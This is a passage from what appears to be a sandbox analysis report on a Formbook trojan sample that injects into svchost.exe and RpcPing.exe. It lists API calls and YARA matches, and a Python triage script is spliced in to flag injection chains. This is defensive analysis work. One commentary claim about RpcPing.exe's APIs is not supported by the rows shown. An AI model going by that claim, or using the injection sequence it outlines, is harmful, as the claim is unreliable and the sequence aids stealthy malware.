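Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F9140 NtReadFile,5_2_004F9140
Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F92D0 NtClose,5_2_004F92D0
Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004096A00_2_004096A0
"""

# One report row. The function id "<pid>_<phase>_<hexaddr>" is repeated at the end of
# the row (a second table column fused onto the first), so a backreference to it pins
# where the comma-separated API list stops.
ROW_RE = re.compile(
    r"^Source: (?P<source>.+?)Code function: "
    r"(?P<fn>\d+_\d+_[0-9A-Fa-f]+)"
    r"(?: (?P<apis>[A-Za-z0-9_,]*))?"
    r"(?P=fn)$"
)

# Native calls grouped by the role they play in a classic injection chain.
# This grouping is the example's own assumption, not something the report states.
PRIMITIVES = {
    "target acquisition": {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"},
    "payload delivery":   {"NtWriteVirtualMemory", "NtCreateSection",
                           "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "memory permissions": {"NtAllocateVirtualMemory", "NtProtectVirtualMemory"},
    "execution hijack":   {"NtQueueApcThread", "NtSetContextThread",
                           "NtGetContextThread", "NtSuspendThread", "NtResumeThread"},
}
# All three roles together are what a thread-injection verdict rests on; permission
# changes alone are far too common in benign code to count.
CHAIN_ROLES = ("target acquisition", "payload delivery", "execution hijack")


def parse_rows(text):
    """Map process image name -> set of API names resolved by its code functions."""
    apis_by_process = defaultdict(set)
    for raw in text.splitlines():
        m = ROW_RE.match(raw.strip())
        if not m:
            continue
        image = m["source"].rsplit("\\", 1)[-1]
        apis_by_process[image]  # register the process even if the row names no API
        for api in (m["apis"] or "").split(","):
            if api:
                apis_by_process[image].add(api)
    return dict(apis_by_process)


def classify(apis):
    """Return the primitives present in one process's API set and whether the
    full acquire/deliver/hijack chain is there."""
    hits = {role: sorted(apis & names) for role, names in PRIMITIVES.items()
            if apis & names}
    chain = all(role in hits for role in CHAIN_ROLES)
    return {"apis": sorted(apis), "primitives": hits, "injection_chain": chain}


def triage(text):
    """Parse report rows and classify every process image found in them."""
    return {image: classify(apis) for image, apis in parse_rows(text).items()}


if __name__ == "__main__":
    for image, verdict in triage(SAMPLE_ROWS).items():
        flag = "INJECTION CHAIN" if verdict["injection_chain"] else "-"
        roles = ", ".join(verdict["primitives"]) or "no injection primitives"
        print(f"{image:18} {flag:16} {roles}")
```

On the sample rows the script flags svchost.exe, whose resolved set covers all three roles, and leaves RpcPing.exe and the dropper unflagged because the rows included for them only read and close files or name no API at all. Run against the full list above, RpcPing.exe's 0x02FCxxxx stubs would be flagged too, since they resolve the same NtOpenProcess, NtMapViewOfSection and NtQueueApcThread trio.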
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004096A0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0042200C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0041A217
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00412216
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0042435D
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004033C0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044F430
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004125E8
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044663B
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00413801
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0042096F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004129D0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004119E3
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0041C9AE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0047EA6F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0040FA10
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044EB5F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00423C81
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00411E78
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00442E0C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00420EC0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0044CF17
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00444FD2
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EBE258
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EC1A60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418443
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EB13
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004023A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FC7A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416623
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402F70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FFCF2
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C4215A
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C4A8AF
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C421AF
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C421BE
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C4412F
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C4C687
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C43F06
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C43F0F
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | Code function: 4_2_02C62D9F
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0304A352
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_030503E6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F9E3F0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03030274
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_030102C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0302A118
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03018158
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_030501AA
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_030481CC
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03022000
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F80100
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FAC6E0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F8C7C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F90770
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FB4750
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03050591
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03042446
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F90535
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0303E4F6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0304AB40
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F8EA80
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03046BD7
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FBE8F0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F768B8
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0305A9A6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F9A840
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F92840
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F929A0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FA6962
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03004F40
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FA2E90
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F90E59
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0300EFA0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F9CFE0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0304EE26
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F82FC8
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0304CE93
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FB0F30
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FD2F28
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0304EEDB
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F80CF2
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F90C00
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F8ADE0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FA8DBF
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_03030CB5
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F9AD00
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0304132D
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FAB2C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F952A0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FD739A
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F7D34C
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_030312ED
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F970C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0305B16B
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F9B1B0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02F7F172
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_02FC516C
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 5_2_0303F0CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304F0E05_2_0304F0E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030470E95_2_030470E9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304F7B05_2_0304F7B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030416CC5_2_030416CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030475715_2_03047571
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F814605_2_02F81460
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0302D5B05_2_0302D5B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304F43F5_2_0304F43F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FD5AA05_2_02FD5AA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FB765_2_0304FB76
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03005BF05_2_03005BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FCDBF95_2_02FCDBF9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03047A465_2_03047A46
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FA495_2_0304FA49
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03003A6C5_2_03003A6C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAFB805_2_02FAFB80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0302DAAC5_2_0302DAAC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0303DAC65_2_0303DAC6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F938E05_2_02F938E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FFD8005_2_02FFD800
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F999505_2_02F99950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAB9505_2_02FAB950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FF095_2_0304FF09
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F99EB05_2_02F99EB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FFB15_2_0304FFB1
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F53FD55_2_02F53FD5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F53FD25_2_02F53FD2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F91F925_2_02F91F92
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03041D5A5_2_03041D5A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03047D735_2_03047D73
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03009C325_2_03009C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAFDC05_2_02FAFDC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F93D405_2_02F93D40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FCF25_2_0304FCF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004E1B905_2_004E1B90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004E52305_2_004E5230
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004E34105_2_004E3410
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004FB9005_2_004FB900
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DCA675_2_004DCA67
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DCA705_2_004DCA70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DCC905_2_004DCC90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DAD105_2_004DAD10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AEE3085_2_00AEE308
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AEE4245_2_00AEE424
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AEE7C35_2_00AEE7C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AED8285_2_00AED828
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AECB135_2_00AECB13
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03287E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0322B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032BF290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02FD7E54 appears 99 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 0300F290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02FFEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02F7B970 appears 274 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02FC5130 appears 37 times
            Source: xBzBOQwywT.exe, 00000000.00000003.1591484081.000000000486D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs xBzBOQwywT.exe
            Source: xBzBOQwywT.exe, 00000000.00000003.1591353836.00000000046C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs xBzBOQwywT.exe
            Source: xBzBOQwywT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000006.00000002.3367695283.0000000004CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000005.00000002.3356645004.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000002.00000002.1804925513.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
